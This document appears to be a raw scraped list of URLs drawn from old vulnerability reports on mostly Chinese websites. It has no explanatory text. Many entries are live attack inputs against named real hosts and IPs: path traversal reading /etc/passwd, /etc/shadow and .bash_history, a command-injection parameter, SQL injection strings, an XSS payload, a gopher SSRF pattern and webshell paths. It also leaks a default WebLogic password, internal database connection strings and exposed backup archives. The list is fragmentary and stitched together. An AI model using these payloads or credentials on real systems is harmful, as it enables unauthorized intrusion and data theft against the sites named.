http://www.19lou.com/topic/activity/activity_ajax.php?obj=activity_item&req=items_by_page&activity_name=sh-2013-ruilinvxing&order=id&asc=asc&order2=&asc2=&col_num=1&per_page=100&page=1&category=sh-ruilinvxing-moon http://www.19lou.com/topic/activity/activity_ajax.php?obj=activity_item&req=items_by_page&activity_name=sh-2013-ruilinvxing&order=id&asc=asc&order2=&asc2=&col_num=1&per_page=100&page=1&category=sh-ruilinvxing-moon http://sqlmap.org http://gakushoku.fukushima-nct.ac.jp/GakuShokuWeb/ShowPortal.action http://gakushoku.fukushima-nct.ac.jp/GakuShokuWeb/ShowPortal.action http://appman.itc.nagoya-u.ac.jp:8080/struts2-showcase/tiles/freemarker.action http://root.yingmoo.com/ http://*.*.*/xss.swf http://bcy.net/novel/detail/11560/493497, http://bcy.net/novel/detail/11560/493525 http://106.38.226.155:8080/ https://www.yonglibao.com/User/auth/verifyCode/ POST:tel=13900001111 http://221.8.57.99:7002/uddiexplorer/1.jsp?o=vLogin http://www.yonglibao.com/App http://**.**.**.**/webmail/login.php http://**.**.**.**/mailcontrol/linux.php?name=x||id http://**.**.**.**/webmail/data/wo.txt http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/data/wo.txt http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**.mo/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**.mo/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**.mo/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://**.**.**.**/webmail/login.php http://pop3.55bbs.com/extmail/cgi/index.cgi http://smtp.55bbs.com/extmail/cgi/index.cgi https://m.xueshandai.com/password/mobile https://github.com/wyk2011fj/wyk.gitwiki.com/blob/935d288e2702a9b64a4a52cd603497de401da544/资料们/简单demo/java邮件发送/mailTest/src/mailTest/test.java https://login.netease.com/accounts/login/?uid=*****&next=***** http://120.55.149.174/ http://nngl.3322.org:8880/ http://data.auto.sina.com.cn/car/api/car_detail/filter_car.php?callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027&_=1458496287525 http://highstyle.fashion.ifeng.com/play/getplay?objname=1 http://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=0&type=1&content=%E6%97%B6%E5%B0%9A%E8%BF%90%E5%8A%A8%E5%B0%8F%E7%99%BD%E9%9E%8B http://**.**.**/_ fir.im/rrc。_ fir.im/rrc。_ http://www.csic-711.com/xw1.php?id=632 http://www.csic-711.com/admin/ http://61.233.8.175/ http://61.233.8.175/wO0yun/index.jsp https://mesosphere.github.io/marathon/docs/ http://111.206.209.149:8080/ui/#/apps http://i.dajianet.com/space.php?uid=518&validated=true http://business.sohu.com/20150812/n418676342.shtml http://107room.com/admin/contact/ https://github.com/birju-qiku/forum-backend/blob/52ab5c5879c9ab029ff8dda0e48857255274f4a4/dev.conf.js https://github.com/birju-qiku/forum-backend/blob/52ab5c5879c9ab029ff8dda0e48857255274f4a4/prod.conf.js http://android.myapp.com/myapp/detail.htm?apkName=com.datebao.datebaoapp http://m.datebao.com/order/postnewcreate http://m.datebao.com/order/newcreate/85?client_type=ios&pk_campaign=from_android http://m.datebao.com https://**.**.**.** jar:/usr/java/bin:/usr/java/lib:/u01/app/oracle/product/10.2/jdbc/lib/ojdbc14.jar:/u01/app/oracle/product/10.2/jdbc/lib/classes12.zip:/u01/app/oracle/product/10.2/jdbc/lib/nls_charset12.jar:/usr/j2ee/lib/j2ee.jar:/usr/local/jakarta/tomcat/bin/bootstrap.jar:/usr/local/jakarta/tomcat/bin/commons-logging-api.jar http://61.142.114.199/ http://61.142.114.199/wO0yun/index.jsp http://ucenter.51cto.com/setemailpass.php?id=7804861&unid=7747d234f4b2b8cab3e55485f2884abc http://ucenter.51cto.com/setemailpass.php?id=7804861&unid=679c5b68bc1b974db24b3c2ca38660a4 http://ucenter.51cto.com/setemailpass.php?id=7804861&unid=27b8a923b86dfba72b40673a7fbecc14 http://ucenter.51cto.com/setemailpass.php?id=10007943&unid=fc0b2180ee91325e44e9782f5b79cad8 http://ucenter.51cto.com/setemailpass.php?id=10007943&unid=cca1df879eec29c438ff2b3767769ef7 http://58.61.147.11/seeyon http://58.61.147.11/seeyon//logs/login.log user:weblogic pwd:weblogic1 http://lab.10jqka.com.cn/school/quickSearch/ http://**.**.**.**/bugs/wooyun-2015-0118302/ http://**.**.**.**:8090/phpmyadmin/ http://cs.dfb365.com http://211.156.198.57 http://211.156.198.57/jsp/yzznzd/clgl/clgl_cx.jsp http://m.keyunzhan.com/zhandaozhan_search.php http://m.keyunzhan.com/index.php?module=Mobile&action=Index&lanmu=tianqi http://m.keyunzhan.com/huoche/find.php http://m.keyunzhan.com/huoche/hcz.php http://agency.1jiajie.com/index.php?action=login http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://220.165.4.29/ http://221.179.193.208/ http://zhaopin.nbcb.cn/recruit/com.nbcb.recruit.auth.index.flow http://zhaopin.nbcb.cn/recruit/rckgl/download.jsp?zipFile=/recruit/resume/schoolResume//20160322012458.zip http://zhaopin.nbcb.cn/recruit/rckgl/download.jsp?zipFile=/etc/shadow http://118.123.173.91/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 http://118.123.173.91/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://118.123.173.91/pweb/careerapply/HrmCareerApplyWorkEdit.jsp?id=1 http://118.123.173.91/pweb/careerapply/HrmCareerApplyWorkView.jsp?id=1 http://118.123.173.91/web/careerapply/HrmCareerApplyWorkEdit.jsp?id=1 http://118.123.173.91/web/careerapply/HrmCareerApplyWorkView.jsp?id=1 http://118.123.173.91/web/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://118.123.173.91/web/careerapply/HrmCareerApplyPerView.jsp?id=1 https://**.**.**.**/jixf8507/kwang/blob/bf66140a67a39f2ea423071285dd419577cea862/wang/src/email.properties http://www.sannongziben.com/ http://demo.sannongziben.com/ http://demo.sannongziben.com/.svn/entries http://cemftp.ce-air.com/yyoa/index.jsp http://cemftp.ce-air.com/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 http://www.ntjxt.com/areas?area_id=1 http://mceair.962008.com/Member/USERINFO/Default.aspx http://mceair.962008.com mceair.962008.com/Control/Destination.aspx mceair.962008.com/%3Fplg_nld%3D1%26plg_uin%3D1%26plg_auth%3D1%26plg_nld%3D1%26plg_usr%3D1%26plg_vkey%3D1%26plg_dev%3D1 http://mceair.962008.com/Member/USERINFO/Default.aspx https://www.pzb.com/view/html/user/forgetPassword.shtml https://www.pzb.com/web/view/anon/new/resetPassword www.pzb.com https://www.pzb.com http://cs.funxoo.com/eshouselist.php?catid=78&posids= http://112.74.111.42:7000/qn/listInfo http://221.179.190.21:8080/ http://42.156.250.117/internal/Explorer http://ninebot.cn/bbs/utility/convert/index.php?a=config&source=d7.2_x2.0 http://ninebot.cn/bbs//utility/convert/data/config.inc.php http://**.**.**.**/bugs/wooyun-2014-063422 http://www.luckyair.net/ http://cargo2.ce-air.com/MU/ http://trb-b2g.ce-air.com/MUB2G/login.do http://www.we189.com/index.php?mod=product&view=show&cd=0&id=401 http://download.ztgame.com:8088/j_acegi_securit http://sqlmap.org http://bj.luckyair.net/8l/report_agent/AgentSalesReport!receive.action?loginIdsStr=0373e0ff6db453c8109dff48f1b4ef54893c87fc347ecc8e5d9952707a283483927d17447741efd295b36bb3dfd743de http://bj.luckyair.net/8l/report_agent/AgentSalesReport!receive.action http://x.luckyair.net:88/cms/logout.jspx?returnUrl=http://www.baidu.com http://pyh.luckyair.net:8081/examples/servlets/servlet/CookieExample?cookiename=HAHA&cookievalue=\"FOO;+Expires=Thu,+1+Jan+2009+00:00:01+UTC;+Path=/ http://www.183read.com/ http://www.dingxincf.com/bbs/uc_server/admin.php http://www.dingxincf.com/bbs/uc_server/1.php http://games.renren.com/bbs.tar.gz https://**.**.**.**/mdm/cd.jsp?z0=utf-8 https://**.**.**.**/mdm/admin/authenticate.do http://103.15.202.155/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Froot%2F.bash_history http://114.80.121.110:8990/login.do http://**.**.**.**/Home-zh.htm http://**.**.**.**/java-deserialization-vulnerability-overlooked-mass-destruction/ http://us.ceair.com:80/muovc/newsitefront/checkin/muss/checkin!doInit.shtml?&redirect:xxx${13579246-1 https://github.com/zjw1993/recruitmentJobSite/blob/f28c8f832a99a87c44f5bce31afcf05eabffb625/src/main/java/com/zjw/recruitmentJobSite/utils/email/MailUtil.java http://m.sinosig.com/mobile/index/index!sendMsg?newMobile=13888888888&token=2882cb3c-4e93-47f9-a5fa-c2b6ab59df04 http://space.show.sina.com.cn/ajax/getMessageLi http://sqlmap.org http://www.madailicai.com/qywf/getPeerAgent.action?ivrMark=0&widgetCode.widgetId=240&visitorSource=%E5%AE%98%E7%BD%91&templateName=2&dialogName=&userId=&smsId=&namews=&unionId=&vistorUrlTitle=&vistorUrl=&14567301704021458307662705 http://cs.xyzq.com.cn:82使用的是jboss,调用jboss的插件发现存在java反序列化漏洞 www.guilincable.com/company.asp?id=2 www.guilincable.com/company.asp?id=2 http://www.scal.com.cn/Web/Home/GetAirPlanList http://www.clic.org.cn/jeeadmin/jeecms/login.do?returnUrl=/jeeadmin/jeecms/index.do http://cloud.isoftstone.com/ https://www.yuanobao.com/index.htm http://invest.10jqka.com.cn/getbankbyall.php?code=00213928 http://invest.10jqka.com.cn/getbankbyall.php?code=00213928 http://invest.10jqka.com.cn/getbankbyall.php?code=00213928 http://www.chebada.com/Home/Index http://ccutnews.ccut.edu.cn/jsp/pl_news.jsp?articleId=2855&_=1458488952199 http://brcms.yixin.com/s/gateway/index.php http://brcms.yixin.com/s/gateway/index.php?gateway_destination=activity_honored_guest_talk/admin/GetList&func_name=GetList&activity_id=1 http://**.**.**.**/DBTVIntegration/sysUser/login.do inurl:news_list.asp?id= http://**.**.**.**/news_list.asp?id=70 url:http://xs.ceair.com/ http://xs.ceair.com/webservice/esbmessage.php http://**.**.**.**/bugs/wooyun-2010-0125244对比了下错误页面 http://utf7.ml/t/uc3.html http://www.10jqka.com.cn/ad_mar/tgt_lwds/index.php?op=post_info&pid=18 http://www.10jqka.com.cn/ad_mar/tgt_lwds/index.php?op=post_info&pid=18 http://sqlmap.org http://121.15.209.216/ GETSHELL:http://121.15.209.216/wo0yun/1ndex.jsp http://cache.video.qiyi.com/vps?tvid=449747800&vid=8619c4c122f01ba70d5d45ce73e7646c&uid=1209531862&v=0&qypid=449747800_33&src=02022001010000000000&t=1458704349000&k_tag=1&k_uid=865700021218002&rs=1&vf=ec92d0a1519a58746ce9457f7f564b47","ip":"106.38.219.22","duration":344,"code":200,"return_data":""},"access_vip":{"url":"","ip":"","duration":0,"code":0,"return_data":""},"access_pdata":{"url":"http://data.video.qiyi.com/videos/v0/20160212/34/b2/9068a56cf18079e67665946f01f05bc7.f4v?qd_tvid=449747800&qd_vipres=0&qd_index=1&qd_aid=449747800&qd_stert=0&qd_scc=c6a193db5b6b1ed90e5323b1336ade72&qd_sc=a4f559061be96311318c6bc786e57297&qd_src=02022001010000000000&qd_ip=2ac82210&qd_uid=1209531862&qd_tm=1458704371000&qd_vip=0","ip":"106.38.178.240","duration":254,"code":200,"return_data":""},"cache_status":{"url":"","ip":"","duration":0,"code":0,"return_data":"","avgspeed":0,"302url":"","idc":"netcnc_oversea http://**.**.**/_ http://**.**.**/_ http://**.**.**/script_ http://cms.kting.cn/index.php?act=login https://github.com/yangyangxf100/mywork/blob/6e058b837b6f8aef30303caba9224d0d41f72964/cms/readMe.txt http://piwik.l99.com http://180.169.108.241:7001/ http://api.yonglibao.com/Apiv7/User/myinfo http://oa.huayetongxun.com:91/MobileApp/login.aspx http://oa.huayetongxun.com:91/MobileApp/login.aspx https://github.com/yhc19850706/yhcgit/blob/a66e184aae2ae52785df6c779257b947101aa353/yhc/src/main/java/com/bl/web/common/utils/MailUtil.java http://daohang.weixin.com/WxList.aspx?classid=1006 http://**.**.**.**//Service/Card/getRequestState http://111.207.209.58:8090/ http://**.**.** http://**.**.**/job/site_ http://**.**.**/_ http://t.10jqka.com.cn/api.php?cookie=user%3DMDpteF8zMDAzODg3NTk6Ok5vbmU6NTAwOjMxMDM4ODc1OTo3LDExMTExMTExMTExLDQwOzQ0LDExLDQwOzYsMSw0MDs1LDEsNDA6MTY6OjozMDAzODg3NTk6MTQ1ODc5Njg5NTo6OjE0NDQzMTc2MDA6MzQyNTkwNTow;userid%3D300388759;u_name%3Dmx_300388759;escapename%3Dmx_300388759;ticket%3Df8aa2fc8c157141d04294be778d9f0b0&followuid=3424215372&method=trace.followAce http://mailer.lvmama.com:8081/smartedm/services http://mailer.lvmama.com:8081/smartedm/services/EDMService?wsdl http://221.228.212.171:8081/smartedm/welcome.do http://221.228.212.171:8081/smartedm/services http://i.meituan.com/salon/barber/9468 http://i.meituan.com/salon/barber/9467 http://47.88.32.21:7001/ http://www.xingduoduo.com/website-rank/getVoteRecordByManuscriptId.action http://**.**.**/_ http://**.**.**/job/ctbTest/ws/shiyi/shiyiTest.java/*view*/_ traffic.chetuobang.com/";_ wxlk.chetuobang.com/";_ wxlk-files.chetuobang.com/";_ http://www.zhemai.com/chaofan/index.php?mod=index&act=index&go_mod=webset&go_act=center http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/script_ ssh://114.215.150.232:8200 mysql://114.215.150.232:3306 index.php/api/xunjia/AjaxAskPrice http://www.ftchinese.com/m/events/recent.html?id=2095 https://dl.wx.cmbchina.com/backup/cmbgo/index.php/Home/Simple/login https://218.17.210.134/backup/cmbgo/index.php/Home/Simple/login https://dl.wx.cmbchina.com/backup http://60.28.198.61:9022 google:inurl:/service/~iufo http://58.61.28.213:8091/开始不确定是国信的IP,反正是这个断.利用神器找到一个弱口令利用weblogic部署了一个war包,搞到了一个shell。一句话被干掉了,就剩下了cmd的 http://219.141.171.219/ajax/LoginAction!login.action http://bbs.juzilicai.com http://bbs.juzilicai.com https://passport.bilibili.com/site处有绑定微博设置。 https://passport.bilibili.com/login http://211.150.66.21/user.action http://message.haidilao.com:8081/ http://fx.lvmama.com/user/index.do http://www.hncgw.cn/Login.aspx http://www.hncgw.cn/html/ http://android.myapp.com/myapp/detail.htm?apkName=com.huolicai.android http://huo.yonglibao.com/ http://www.dragontrans.com/ http://**.**.**/ http://**.**.**/bea_wls_internal/a.jspx jdbc:oracle:thin:@10.254.0.146:1521:lbxolap user:lbxhis http://**.**.**/ETMS/setLang.action_ http://**.**.**/_ cast:198.25.100.191***** a9d:67ff:fe15:7***** http://www.baomihua.com/space/RankAllList.aspx http://static.baomihua.com/doc.rar http://show.baomihua.com/baomihua.tar.gz http://resources.baomihua.com/swf.rar http://reg.baomihua.com/reg.rar http://pvstat.baomihua.com/wwwroot.rar https://github.com/iRunningClub/www/blob/2b592a3ec80f1fd1263b2e09348cec0a1e719948/kohana/modules/author/config/author.php http://wx.foundersc.com/../../../../../../../../etc/passwd http://i.wps.cn/?act=login登陆位置没有验证码没有登陆限制 http://**.**.**.**/tsky/ http://**.**.**.**/login_cn.jsp http://**.**.**.**//js/%C0%AE%C0%AE/WEB-INF/web.xml http://**.**.**.**/css/%C0%AE%C0%AE/WEB-INF/web.xml http://**.**.**.**//%c0%ae/WEB-INF/web.xml https://112.124.107.207:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd http://**.**.**.** http://tuiguang.guagua.cn/ http://tuiguang.guagua.cn/xiaoma.php http://**.**.**.**/涉及全国各省市业务 http://www.wandoujia.com/apps/com.gold.palm.kitchen http://android.myapp.com/myapp/detail.htm?apkName=com.gold.palm.kitchen http://apk.hiapk.com/appinfo/com.gold.palm.kitchen http://zhushou.360.cn/detail/index/soft_id/485874?recrefer=SE_D_%E6%8E%8C%E5%8E%A8 http://boss.izhangchu.com/main/index http://boss.izhangchu.com/main/index http://h5.izhangchu.com) http://xxx.xxx.xxx.xxx:6080/main.php?sessid=5772430e1cd708d2521d9a0dedadd904&act=netdisk&opt=html5upload&ftpfolder=Ly4uLy4uL3dlYm1haWwvd3d3Lw==&retid=0.8386508285207916 http://**.**.**.**/bugs/wooyun-2010-0166751 file:/// gopher://remote_ip:port/?%a file:/// gopher://remote_ip:port/?%a https://103.240.244.6/mdm/f.jsp?z0=utf-8 https://mdm.haidilao.com/mdm/temp/user/template.csv https://mdm.haidilao.com/mdm/selfDevice/toDeviceDetail.do?deviceId=566 http://igame.qq.com/pmdcampus/wx-app/order-detail.php?uid=0EEF79D800EDDB9ED27F6552FABB7F2C55A5E4DFD68C675B&ctime=1458560346就不出出现提醒请在微信客户端打开该链接了。 http://wx.sohu-inc.com/index.jsp http://wx.sohu-inc.com/wAction!findWorks.action http://m.52zzb.com/cm/mobile/basedata/my/getMyPoliciesByPagging http://m.52zzb.com url:http://crm.iflytek.com/ http://event.leyingke.com/spec/recruitment/personal/ http://www.fsdsm.gov.cn/index.jhtml http://www.fsdsm.gov.cn:7001/console http://passport.bilibili.com/intranet/acc/login?mid=1 http://oa.bjsto.cn/C6/Jhsoft.Web.login/newview.aspx?id=1 http://e.dxy.cn/harmonic2012/surgery/21/2 http://e.dxy.cn/harmonic2012/surgery/21'%20and%20'1'='1 http://e.dxy.cn/harmonic2012/surgery/21'%20and%20'1'='2 http://z.mafengwo.cn/lvyou/57178.html http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/search http://218.17.224.157/ http://www.wandoujia.com/apps/com.brightdairy.personal http://zhushou.360.cn/detail/index/soft_id/3013276?recrefer=SE_D_%E5%85%89%E6%98%8E%E9%9A%8F%E5%BF%83%E8%AE%A2 http://android.myapp.com/myapp/search.htm?kw=%E5%85%89%E6%98%8E%E9%9A%8F%E5%BF%83%E8%AE%A2 http://mobile.baidu.com/#/item?docid=8113206&source=mobres&from=1010680m jdbc:oracle:thin:@**.**.**.**:1521:ORA11G jdbc:oracle:thin:@**.**.**.**:1521:ORA11G http://www1.kugou.com/ting/Pager.aspx?r=0.21206053676474657&tableName=Comments&action=getdata&pageSize=6&selectFields=&orderField=AddTime&isDesc=True&where=++Source%3D2+and+SourceID%3D53*++&pageIndex=1 http://www1.kugou.com/ting/Pager.aspx?r=0.21206053676474657&tableName=Comments&action=getdata&pageSize=6&selectFields=&orderField=AddTime&isDesc=True&where=++Source%3D2+and+SourceID%3D53*++&pageIndex=1 http://sqlmap.org jdbc:oracle:thin:@ jdbc:oracle:thin:@// http://weixin.axatp.com/phpmyadmin/ http://imo.cheyipai.com/file/NDisk/write.php http://imo.cheyipai.com/file/NDisk/write.php http://222.66.197.152/ http://222.66.197.152/uddiexplorer/ssss.jsp http://221.8.57.106:7002/mses/ http://221.8.57.106:7002/uddiexplorer/cccc.jsp jdbc:oracle:thin:@10.0.7.101:1521:ahdb http://**.**.**.**/mall/getOrderInfoOfCustomer.htm?orderId=14414&wechatAccount=gh_445933eaf53a http://**.**.**.**/mall/getOrderInfoOfCustomer.htm?orderId=14415&wechatAccount=gh_445933eaf53a https://github.com/xwx2015/lifecircle/blob/51bb06bb46bc641de2225d42cfb0e23b68ff4f7e/Web.config http://m.rrs.com/ http://123.***.***.***:47088/essframe www.comsenz-service.com http://wuhan.wandamoviepark.com/ http://query.hex.wanmei.com/card/search?rarties=1,2&rule=1&type= http://oa.puxinasset.com/pxoec/admin/login.action存在struts2命令执行 http://oa.puxinasset.com/pxoec/woo.jsp http://jdgc.dept.ccut.edu.cn/pic.asp?id=919&w=2&s_hh=200 http://login.sina.com.cn/sso/login.php?su=ZnNkZnNkZicvPg0KPHNjcmlwdD4NCmFsZXJ0KC94c3MvKTsNCjwvc2NyaXB0Pjwn&sp=&encoding=UTF-8&returntype=META http://login.sina.com.cn/sso/login.php?url=http%3A%2F%2Fweibo.com%2F&gateway=1&service=miniblog&entry=miniblog&useticket=1&returntype=META&_client_version=0.6.14 http://passport.weibo.com/wbsso/login?url=http%3A%2F%2Fweibo.com%2F&ticket=ST-*****-1459053552-xd-5025***98696******922F1*30E&retcode=0 http://gd.qq.com/zt2015/clxyy/index.htm www.jjlwd.com http://www.jjlwd.com/mobile/appService.do http://www.jjlwd.com/mobile/appService.do www.jjlwd.com www.zugame.com http://webcache.googleusercontent.com/search?q=cache:IDhqSoxR910J:blog.devbook.cn/815187/article/20+&cd=1&hl=zh-CN&ct=clnk&gl=cn http://m.yicp.com/ http://bolt.jebe.renren.com/bolt/member/city.htm?provinceCode=0086130000000000 http://228pw.com/piao.asp?sclass=1” http://228pw.com/piao.asp?sclass=1” http://**.**.**.** http://**.**.**.**:6080/viewsharenetdisk.php?userid=postmaster&opt=view&filename=Li4vLi4vLi4vLi4vLi4vLi4vd2luZG93cy93aW4uaW5p http://**.**.**.**:6080/viewsharenetdisk.php?userid=postmaster&opt=view&filename=Li4vLi4vZGF0YS9hZG1pbnVzZXIuY2Zn http://**.**.**.**:6080/viewsharenetdisk.php?userid=postmaster&opt=sharelink&filename=Li4vLi4vd2VibWFpbC90ZW1wL19zZXNzaW9ucw== http://**.**.**.**:6080/viewsharenetdisk.php?userid=postmaster&opt=sharelink&filename=Li4vLi4vZGF0YQ== https://118.145.2.40:4850 https://118.145.2.41:4848 https://118.145.2.41:4850 https://118.145.2.42:4848 https://118.145.2.42:4850 https://118.145.2.44:4848 https://118.145.2.44:4850 https://appupload.fenxiangplus.cn:4848 http://118.145.2.41:7031/share_backend/login.html http://www.okdai.com/ FF3BCFEEB5FC0CF153C9245589ACCC92:FG=1 email:bsharesync www.okdai.com http://shop.aigame100.com/list/list.aspx?Types=1 http://www.cnfeol.com/jpgrotatorxml.aspx?cid=mengtie_default http://mai.damai.cn/gallery-ajax_get_goods.html www.zjykrc.com http://www.sanjialiu.com/ http://www.sanjialiu.com/UCenter/MyAddressEdit?aid=5525 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/cgi-bin/web_cgi_main.cgi http://**.**.**.**/v2/index.html http://**.**.**.**/N.aspx http://**.**.**.**/mobctgettianqi http://**.**.**.**/mobctgettianqi http://www.swsresearch.com/cn/ViewItem.aspx?table=swwebcontent&id=17637 http://www.henxinht.com。 http://www.henxinht.com/lates/index.html http://www.henxinht.com/lates/index.html?username=123%27/**/and/**/%28seleselectct/**/1/**/from/**/%28selselectect/**/count%28*%29,concat%280x7e,user%28%29,0x7e,floor%28rand%280%29*2%29%29x/**/from/**/information_schema.tables/**/group/**/by/**/x%29a%29%23_ http://android.myapp.com/myapp/detail.htm?apkName=com.okdai http://app.okdai.com/api/Account/BankList http://club.dxy.cn/littmann/rank/top/3 http://club.dxy.cn:80/littmann/rank/top/3 http://socks.ustack.com http://jira.ustack.com http://project.ustack.com https://www.ustack.com http://zabbix.ustack.com http://bbs.c.163.com/signin/ coding:utf-8 http://**.**.**/phpmyadmin/_ http://sso.auxgroup.com/login http://oa.g5air.com/ http://**.**.**.**:9999/main/login.asp?errMsg=1 http://house.baidu.com:80/bj/pricetrend/dataflash/%E6%B5%B7%E6%B7%80/ http://house.baidu.com:80/bj/pricetrend/dataflash/%E6%B5%B7%E6%B7%80/ http://www.papajohnschina.com/online/index.jsp?lang=zh_CN http://www.papajohnschina.com/ccbs/ccbs/appupdate/appUpdateMain.jsp http://www.papajohnschina.com/ccbs/ http://www.papajohnschina.com/ccbs/ccbs/order/showOrderList.do?method=showOrderDetailJsp&orderId=908340 http://eproc.presidentofnepal.gov.np/minutes_detail.php?tid=11 http://**.**.**.**.np//minutes_detail.php?tid=11 http://**.**.**.**.np//minutes_detail.php?tid=11 http://edudbc.gov.np//minutes_detail.php?tid=11 http://eproc.dor.gov.np//minutes_detail.php?tid=11 http://**.**.**.**.np/ebid//minutes_detail.php?tid=11 http://eproc.presidentofnepal.gov.np/minutes_detail.php?tid=2 http://eproc.presidentofnepal.gov.np/minutes_detail.php?tid=2 https://gw-m.sino-life.com/SL_MAS/mas/appPost.do site:www.chinaexpressair.com http://www.chinaexpressair.com/forpay_2015112527750.html http://www.chinaexpressair.com/HXHK/forpay_2015112227458.html http://www.chinaexpressair.com/HXHK/forpay_2016010131724.html http://www.chinaexpressair.com/forpay_2016012836719.html www.chinaexpressair.com http://love.dangdang.com/mg.php/main/addintronum?id=59&type=KOL site:np.etcp.cn http://np.etcp.cn/withdrawalBill/billing?autoid=ci3NoJP1g4U=&condition=2&isMantual=false&persion=wjsctcc&persionid=1350&isclass=0&roleid=22&realpersion=%E9%99%88%E6%BA%90 http://**.**.**.**:7021/ http://tes.chinatelling.com/ http://tes.chinatelling.com:8080/ http://tes.chinatelling.com:8080/is/index.jsp http://bid.dongyuechem.com http://bid.dongyuechem.com/Products/Tiens/CategoryStockView.aspx?id=1 https://**.**.**.**/coca1ne/DLL_Hijacker http://**.**.**.**/upload/image/201603/2016032814554724178.gif http://114.141.189.2/load.htm http://140.207.160.130/load.htm http://www.zihexin.net/brand/offersinfor.do?action=4&ID=540055 http://www.zihexin.net/client/unit.do?method=info&STORE_ID=4000105444100022 http://**.**.**.**:7001/defaultroot/work_flow/formOptJSPUpload.jsp http://**.**.**.**:7001/defaultroot/work_flow/test.jsp http://**.**.**.**:7001/defaultroot/work_flow/test2.jsp http://www.jinshangdai.com/user/findpwd.html http://219.143.202.137:8080/notice/searchNotice.action?categoryId=9639398 http://219.143.202.137:8080 http://cp.iciba.com/android/ www.tianshijie.com.cn http://www.tianshijie.com.cn http://comment.10jqka.com.cn/comment_v2.php?seq=1970*&startnum=0&getnum=5&jsoncallback=jQuery17207547062449157238_1459159739394&type=hot&_=1459159739435 http://www.webpowerchina.com:80/ http://www.t-rex.cn/artInfo.php?id=131 http://113.204.104.235/aspx/ch/Search.aspx?key=1 http://cspp.10jqka.com.cn/common/feedback/index/ http://vis.10jqka.com.cn/management/cspp/feedback/index/ http://123.127.198.90/console/ 